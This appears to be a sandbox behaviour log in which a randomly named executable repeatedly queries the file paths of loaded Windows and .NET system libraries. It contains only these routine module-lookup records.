Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
